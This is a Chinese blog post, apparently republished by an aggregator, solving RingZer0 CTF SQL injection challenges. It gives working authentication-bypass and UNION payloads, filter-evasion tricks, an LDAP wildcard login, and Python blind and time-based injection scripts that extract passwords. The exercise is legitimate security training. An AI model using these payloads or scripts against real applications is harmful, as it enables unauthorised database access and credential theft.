萌新福利—sql注入之旅
Posted 网络空间安全社
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了萌新福利—sql注入之旅相关的知识,希望对你有一定的参考价值。
前记
https://ringzer0team.com
Most basic SQLi pattern.(point 1)
签到题:
username: admin'#
password: 1
可以得到flag:FLAG-238974289383274893
ACL rulezzz the world.(point 2)
随手测试
username=admin'
得到
You have an error in your SQL syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''admin''' at line 4
随手闭合一下
username=admin' or 1#
得到flag:FLAG-sdfoip340e89rfuj34woit
Login portal 1(point 2)
过滤了
#
--
=
其他没测试,直接随手pass
username=admin' or 'a' like 'a&password=1
即可拿到flag:FLAG-4f885o1dal0q1huj6eaxuatcvn
Random Login Form(point 2)
随手试了一下二次注入,发现有点不像
于是进行长度截断
注册
username=admin 1
password=1
登录
username=admin
password=1
得到flag:FLAG-0Kg64o8M9gPQfH45583Mc0jc3u
Just another login form(point 2)
尝试了一下无果,于是尝试联合注入
username = admin' union select md5(1),md5(1),md5(1)#
password = 1
得到回显:Bad search filter
搜索发现是LDAP的特定错误
于是登录
username = *
password = *
得到flag:FLAG-38i65201RR4B5g1oAm05fHO0QP
这是一个值得研究的点,默默记下了~最近的sql注入很少见,记得以前XCTF联赛中出现过~
Po po po po postgresql(point 2)
随手试试
username=admin' or 'a' like 'a&password=1
回显
ERROR: invalid input syntax for type boolean: "admin"
LINE 1: SELECT * FROM users WHERE (username = ('admin' or 'a' like '...
于是闭合
username=admin') or 'a' like 'a') -- &password=1
得到flag:FLAG-mdeq68jNN88xLB1o2m8V33Ld
Don't mess with Noemie; she hates admin!(point 3)
尝试
username = admin' or sleep(5) or 'a' like 'a
发现sleep成功
说明闭合有效
那么直接刚
username = admin' or 'a' like 'a
发现登录失败
那么猜想后台语句
$sql = select * from users where username='$username' and password = '$password'
所以我们尝试
username = 1' or 1 or '
password = 1
带入即
select * from users where username='1' or 1 or '' and password = '1'
即可成功绕过
得到flag:FLAG-Yk3Hfovvb5kALU9hI2545MaY
What's the definition of NULL(point 3)
看到url:?id=MQ==
明显是base64
解一下,发现是:id=1
随手测试
id = 1'#
id = MScj
得到
SQLite Database error please try again later.
然后自己测试了很久无果
回到起点,想起来他有描述
Hint WHERE (id IS NOT NULL) AND (ID = ? AND display = 1)
看来后台sql的确是这么写的
WHERE (id IS NOT NULL) AND (ID = base64_decode($_GET[id]) AND display = 1)
构造
0) OR (ID IS NULL) OR (1=2
带入得:
WHERE (id IS NOT NULL) AND (ID = 0) OR (ID IS NULL) OR (1=2 AND display = 1)
编码一下
?id=MCkgT1IgKElEIElTIE5VTEwpIE9SICgxPTI=
得到flag:FLAG-sQFYzqfxbZhAj04NyCCV8tqA
这个题也挺有意思的,值得研究一下~
Login portal 2(point 3)
上去就尝试
username = 1' or 1 or '
password = 1
毕竟老套路
回显
Wrong password for impossibletoguess.
发现impossibletoguess很可疑
可能是个用户名,竟然回显了,那试试union
username = 1' union select 1,2#
password = 1
回显
Wrong password for 1.
剩下的就是联合注入了
1' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2#
Wrong password for users.
1' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users'),2#
Wrong password for username,password.
1' union select (select username from users limit 0,1),2#
Wrong password for impossibletoguess.
1' union select (select password from users limit 0,1),2#
Wrong password for 1b2f190ad705d7c2afcac45447a31b053fada0c4.
长度40的密码,显然不是md5,猜测为sha1
联合注入
username = impossibletoguess' union select sha1(1),sha1(1)#
password = 1
登录成功,得到flag:FLAG-wlez73yxtkae9mpr8aerqay7or
Quote of the day(point 4)
随手测试id
?q=2'
No result found for id "2'"
发现可以回显,尝试Union,发现空格被过滤,用%0a绕过
?q=2%0aunion%0aselect%0a1,2#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: 2
然后老套路即可:
?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(
TABLE_NAME)%0afrom%0ainformation_schema.TABLES%0awhere%0aTABLE_SCHEMA=database())#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: alkdjf4iu,quotes
?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(COLUMN_NAME)%0afrom%0ainformation_schema.COLUMNS%0awhere%0aTABLE_NAME=0x616c6b646a66346975)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: id,flag
?q=2%0aunion%0aselect%0a1,(select%0aflag%0afrom%0aalkdjf4iu%0alimit%0a0,1)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J
over~
Thinking outside the box is the key(point 4)
随手尝试
?id=2'
得到
SQLite Database error please try again later.
知道了是SQLite
继续测试
?id=2 and 1=2 union select 1,2 from sqlite_master
2
?id=2 and 1=2 union select 1,sqlite_version() from sqlite_master
3.8.7.1
?id=2 and 1=2 union select 1,((select name from sqlite_master where type='table' limit 0,1)) from sqlite_master
random_stuff
依次类推,得到所有表名
random_stuff
ajklshfajks
troll
aatroll
我选择ajklshfajks
根据之前的经验,应该是flag字段了
?id=2 and 1=2 union select 1,((select flag from ajklshfajks limit 0,1)) from sqlite_master
FLAG-13lIBUTHNFLEprz2KKMx6yqV
over~
No more hacking for me!(point 4)
好坑,f12源代码里有说明
<!-- l33t dev comment: -->
<!-- No more hacking attempt we implemented the MOST secure filter -->
<!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->
我说我为什么一直做不出来:(
发现这一点后就很容易了:
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527 limit 0,1 --
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527 and tbl_name=%252527random_data%252527 limit 0,1 --
random_data CREATE TABLE random_data (id int, message varchar(50), display int)
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --
即可得到flag
FLAG-ev72V7Q4a1DzYRw5fxT71GC815JEQuote of the day reloaded(point 5)
感觉题目是不是有点脑洞?还是我没发现
尝试来尝试去,发现这样可以成功
?q=3\&s=ununionion select 1,2%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: 2
union要双写绕过
?q=3\&s=ununionion%20select%201,(select%20group_concat(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=database())%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: qdyk5,quotes
?q=3\&s=ununionion%20select%201,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7164796b35)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: id,flag
?q=3\&s=ununionion%20select%201,(select flag from qdyk5 limit 0,1)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: FLAG-enjlleb337u17K7yLqZ927F3
over~
(注:虽然做出来了,还是觉得摸不着头脑,感觉关联性不强啊,我也是随手试出来的= =)
Hot Single Mom(point 6)
看到描述
Get laid or get lazy it's up to you
Find online hot single Mom
就知道不是什么正经题目,果然网站挂了(滑稽)
但是有说明题目来源:GoSecure CTF 2014
搜索了一下
https://gist.github.com/h3xstream/3bc4f264cc911e37f0d6
应该是道不错的注入题目
有flag:FLAG-wBGc5g147MuVQuC28L9Tw8H8HF
Login portal 3(point 6)
这题我用了盲注,但是目前为止这是第一道用盲注的题,所以不知道是不是做麻烦了~
脚本如下
import requestsimport stringurl = "https://ringzer0team.com/challenges/5"cookie = {
"phpSESSID":"27vctgun5jjk5ou82oqv9clog2",
"_ga":"GA1.2.1724649637.1519735081",
"_gid":"GA1.2.933125333.1519735081"}flag = ""for i in range(1,1000):
print "i:",i
for j in range(33,127):
#for j in "0123456789"+string.letters+"-_!@#$^&*()={}":
data = {
#"username":"1' or (substr((database()),%s,1)='%s') and 'a'='a"%(i,j), login3
#"username": "1' or (substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1)='%s') and 'a'='a" % (i, j), users
#"username": "1' or (substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7573657273),%s,1)='%s') and 'a'='a" % (i, j),username,password
"username": "1' or (ascii(substr((select password from users limit 0,1),%s,1))=%s) and 'a'='a" % (i, j),
"password":"1" #SQL1nj3ct10nFTW
}
r = requests.post(data=data,url=url,cookies=cookie)
if "Invalid username / password" in r.content:
flag += chr(j)
print flag
break
列名我没跑(滑稽脸),毕竟知道了他的套路,猜测是password,一猜就中~~
最后得到密码
SQL1nj3ct10nFTW登录拿到flag:FLAG-vgnvokjmi3fgx0s23iv5x8n2w2
When it's lite it's not necessarily easy(point 6)
随手测试
username = 1' or sleep(5) or 'a'='a
password = 1
发现报错
SQLite Database error please try again later. Impossible to fetch username & password from users table
这也省事了,直接把列名,表名都弄出来了
于是直接取password进行盲注即可
import requestsimport stringurl = "https://ringzer0team.com/challenges/19"cookie = {
"PHPSESSID":"27vctgun5jjk5ou82oqv9clog2",
"_ga":"GA1.2.1724649637.1519735081",
"_gid":"GA1.2.933125333.1519735081"}flag = ""for i in range(1,1000):
print "i:",i
for j in "0123456789"+string.letters+"-_!@#$^&*()={}":
data = {
"username": "1' or (substr((select password from users limit 0,1),%s,1)='%s') and 'a'='a" % (i, j),
"password":"1" #4dm1nzP455
}
r = requests.post(data=data,url=url,cookies=cookie)
if "Invalid username / password" in r.content:
flag += j
print flag
break
得到密码
4dm1nzP455登录拿到flag:FLAG-rL4t5LRMwjacD82G9vpAd6Gm
Internet As A Service(point 7)
疯狂测试后得到payload:
/?s = 1'<0e0union select 1,2,3#
然后老套路即可
?s=1'<0e0union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1#
iaas
?s=1'<0e0union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA like 0x69616173 limit 0,1#
iaas
rz_flag
?s=1'<0e0union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME like 0x727a5f666c6167 limit 0,1#
flag
?s=1'<0e0union select 1,2,flag from rz_flag limit 0,1#
FLAG-0f6Ie30uNz4Dy7o872e15lXLS2NKO1uj
over~~
Login portal 4(point 7)
这题用了时间盲注
脚本如下
import requestsurl = "https://ringzer0team.com/challenges/6"cookie = {
"PHPSESSID":"vtqgjp8amva1fsr6eolee70af4",
"_ga":"GA1.2.1724649637.1519735081",
"_gid":"GA1.2.933125333.1519735081",
"_gat":"1"}flag = ""for i in range(1,1000):
for j in range(33,127):
print "i:", i,"j:",j
data = {
"username":"1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '"%(i,j),
"password":"1"
}
try:
r = requests.post(url=url,data=data,cookies=cookie,timeout=2.5)
except:
flag += chr(j)
print flag
break
得到密码:
UrASQLi1337!登录后拿到flag
FLAG-70ygerntbicjdzrxmm0rmk0xx2后记
本人算是抛砖引玉啦~由于能力有限,只能给出大部分题目题解,还有一些有趣的题目待大家继续深挖啦~期待与各位大师傅的套路~Orz
以上是关于萌新福利—sql注入之旅的主要内容,如果未能解决你的问题,请参考以下文章
安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段